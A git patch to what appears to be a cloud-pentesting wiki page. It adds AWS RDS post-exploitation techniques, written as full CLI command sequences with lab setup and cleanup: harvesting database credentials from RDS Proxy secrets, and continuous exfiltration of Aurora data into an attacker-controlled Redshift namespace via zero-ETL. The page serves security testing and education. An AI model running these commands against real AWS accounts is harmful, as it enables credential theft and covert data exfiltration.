From 6dd86b2c9ef29675d4b375d20f5ce6bef269dd05 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 7 Oct 2025 17:28:10 +0200 Subject: [PATCH] rds post recheck --- .../aws-rds-post-exploitation.md | 187 +++++++++++++++++- 1 file changed, 185 insertions(+), 2 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md index cc1920aff..2d4883f4c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md @@ -174,8 +174,6 @@ aws rds stop-db-instance-automated-backups-replication \ -{{#include ../../../banners/hacktricks-training.md}} - ### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs. @@ -455,3 +453,188 @@ Notes: - If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls. - For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn. - Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False. + + +### Harvest DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`) + +Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow `kms:Decrypt`. + +Permissions needed (minimum): +- `rds:DescribeDBProxies` +- `secretsmanager:GetSecretValue` on the referenced SecretArn +- Optional when the secret uses a CMK: `kms:Decrypt` on that key + +Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement. 
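If step 2 below fails on KMS rather than on Secrets Manager, the secret is likely encrypted with a CMK. A minimal check (a sketch, assuming `secretsmanager:DescribeSecret` and `kms:DescribeKey` are also granted; `<SecretArn>` comes from the proxy enumeration):

```bash
# Which key encrypts the proxy secret? "None" => AWS-managed key aws/secretsmanager
KMS_KEY=$(aws secretsmanager describe-secret --secret-id <SecretArn> \
  --query KmsKeyId --output text)
# KeyManager CUSTOMER => a CMK whose key policy may mis-grant kms:Decrypt
[ "$KMS_KEY" != "None" ] && aws kms describe-key --key-id "$KMS_KEY" \
  --query "KeyMetadata.[KeyId,KeyManager]" --output text
```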
Steps
```bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
  --query "DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn]" \
  --output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
  --secret-id <SecretArn> \
  --query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
```

Lab (minimal to reproduce)
```bash
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
  --region $REGION --name rds/proxy/aurora-demo \
  --secret-string '{"username":"admin","password":"S3cr3t!"}' \
  --query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"rds.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name rds-proxy-secret-role \
  --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
sleep 10  # allow IAM role propagation
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
  --auth "AuthScheme=SECRETS,SecretArn=$SECRET_ARN" \
  --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
  --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
# Poll until the proxy reports status "available"
until [ "$(aws rds describe-db-proxies --db-proxy-name p0 \
      --query "DBProxies[0].Status" --output text)" = "available" ]; do sleep 15; done
# Now run the enumeration + secret read from the Steps above
```

Cleanup (lab)
```bash
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
```

### Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time copy of the data without database credentials, snapshots, or network exposure.

Permissions needed (minimum):
- `rds:CreateIntegration`, `rds:DescribeIntegrations`, `rds:DeleteIntegration`
- `redshift:PutResourcePolicy`, `redshift:DescribeInboundIntegrations`, `redshift:DescribeIntegrations`
- `redshift-data:ExecuteStatement/GetStatementResult/ListDatabases` (to query)
- `rds-data:ExecuteStatement` (optional; used to seed data in the sketch after step 3)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.
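Before building anything, existing integrations can be enumerated passively; with only the describe permissions this already reveals which clusters stream into which Redshift targets (a quick recon sketch):

```bash
# Passive recon: any zero-ETL integrations already configured in the account?
aws rds describe-integrations --region us-east-1 \
  --query "Integrations[].[IntegrationName,SourceArn,TargetArn,Status]" --output table
```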
+1) Create Redshift Serverless namespace + workgroup + +```bash +REGION=us-east-1 +RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \ + --admin-username adminuser --admin-user-password 'AdminPwd-1!' \ + --query namespace.namespaceArn --output text) +RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \ + --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \ + --query workgroup.workgroupArn --output text) +# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL) +aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \ + --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true +``` +
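At the time of writing the AWS CLI ships no waiter for Redshift Serverless, so the "wait until AVAILABLE" comment above can be implemented with a small polling loop (sketch):

```bash
# Poll the workgroup status until it becomes AVAILABLE (no built-in waiter exists)
until [ "$(aws redshift-serverless get-workgroup --region $REGION \
      --workgroup-name ztl-wg --query workgroup.status --output text)" = "AVAILABLE" ]; do
  sleep 15
done
```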
+ +
2) Configure Redshift resource policy to allow the Aurora source

```bash
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
# The source cluster ARN is predictable from the identifier created in step 3
SRC_ARN=arn:aws:rds:$REGION:$ACCOUNT_ID:cluster:aurora-ztl
# Standard zero-ETL authorization: the Redshift service may authorize inbound
# integrations from the source ARN, and the account principal may create them
cat > rs-rp.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "Service": "redshift.amazonaws.com" },
      "Action": "redshift:AuthorizeInboundIntegration",
      "Resource": "$RS_NS_ARN",
      "Condition": { "StringEquals": { "aws:SourceArn": "$SRC_ARN" } }
    },
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::$ACCOUNT_ID:root" },
      "Action": "redshift:CreateInboundIntegration",
      "Resource": "$RS_NS_ARN"
    }
  ]
}
EOF
aws redshift put-resource-policy --region $REGION \
  --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
```
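To confirm the policy is attached to the namespace (sketch; assumes `redshift:GetResourcePolicy` is also granted):

```bash
# Read back the resource policy attached to the namespace
aws redshift get-resource-policy --region $REGION \
  --resource-arn "$RS_NS_ARN" --query ResourcePolicy.Policy --output text
```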
+3) Create Aurora PostgreSQL cluster (enable Data API and logical replication) + +```bash +CLUSTER_ID=aurora-ztl +aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --engine aurora-postgresql --engine-version 16.4 \ + --master-username postgres --master-user-password 'InitPwd-1!' \ + --enable-http-endpoint --no-deletion-protection --backup-retention-period 1 +aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID +# Serverless v2 instance +aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately +aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \ + --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID +aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +# Cluster parameter group for zero‑ETL +aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \ + --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params" +aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \ + ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ + ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ + ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \ + ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot +aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately +aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text) +``` +
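To make the replication observable, a few recognizable rows can be seeded through the Data API enabled above. This is where the optional `rds-data:ExecuteStatement` permission comes in; the sketch assumes a lab-only Secrets Manager secret (`aurora-ztl-creds`, a name chosen here) holding the master credentials:

```bash
# Lab-only secret so the Data API can authenticate to the cluster
DB_SECRET=$(aws secretsmanager create-secret --region $REGION --name aurora-ztl-creds \
  --secret-string '{"username":"postgres","password":"InitPwd-1!"}' \
  --query ARN --output text)
# Separate calls: rds-data may reject multi-statement SQL
for SQL in "create schema ztl" \
           "create table ztl.customers (id int primary key, name text)" \
           "insert into ztl.customers values (1,'Alice'),(2,'Bob')"; do
  aws rds-data execute-statement --region $REGION --resource-arn "$SRC_ARN" \
    --secret-arn "$DB_SECRET" --database postgres --sql "$SQL"
done
```

Zero-ETL generally requires tables to have primary keys, hence the explicit `primary key` above.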
+ +
+4) Create the zero‑ETL integration from RDS + +```bash +# Include all tables in the default 'postgres' database +aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \ + --target-arn "$RS_NS_ARN" --integration-name ztl-demo \ + --data-filter 'include: postgres.*.*' +# Redshift inbound integration should become ACTIVE +aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN" +``` +
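The integration takes several minutes to provision; since there is no waiter, poll the status (sketch; the lowercase `active` status string is the assumption here):

```bash
# Poll the RDS-side integration until it becomes active
until [ "$(aws rds describe-integrations --region $REGION \
      --query "Integrations[?IntegrationName=='ztl-demo'].Status | [0]" \
      --output text)" = "active" ]; do
  sleep 30
done
```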
+ +
5) Materialize and query replicated data in Redshift

```bash
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "select integration_id from svv_integration" # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
  --sql "create database ztl_db from integration '<integration_id>' database postgres"
# List the replicated tables
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
  --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
```
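`redshift-data` is asynchronous: `execute-statement` only returns a statement Id, so the rows themselves are fetched in a second step (sketch):

```bash
# Run a query and pull the rows back once the statement has finished
SID=$(aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg \
  --database ztl_db --sql "select * from ztl.customers" --query Id --output text)
aws redshift-data describe-statement --region $REGION --id "$SID" \
  --query Status --output text   # repeat until FINISHED
aws redshift-data get-statement-result --region $REGION --id "$SID" --query Records
```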
+ +Evidence observed in test: +- redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-... +- SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation. +- After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob). + +Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster. + + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file